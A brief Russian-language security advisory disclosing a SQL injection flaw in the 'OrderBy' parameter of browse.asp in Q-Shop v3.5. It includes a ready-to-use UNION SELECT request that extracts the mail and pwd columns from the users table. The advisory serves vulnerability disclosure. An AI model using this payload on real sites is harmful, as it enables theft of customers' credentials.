Программа: Q-Shop v3.5

Обнаруженная уязвимость озволяет выполнить нападение SQL инъекции. Сценарий browse.asp недостаточно санирует параметр "OrderBy" перед использованием их в SQL запросе.

Пример:

###http://[target]/[path]/browse.asp?cat=42&ManuID=&OrderBy=[SQL HERE]

browse.asp?cat=42&ManuID=&OrderBy=1%20union%20select%200,mail,0,pwd, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20users

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии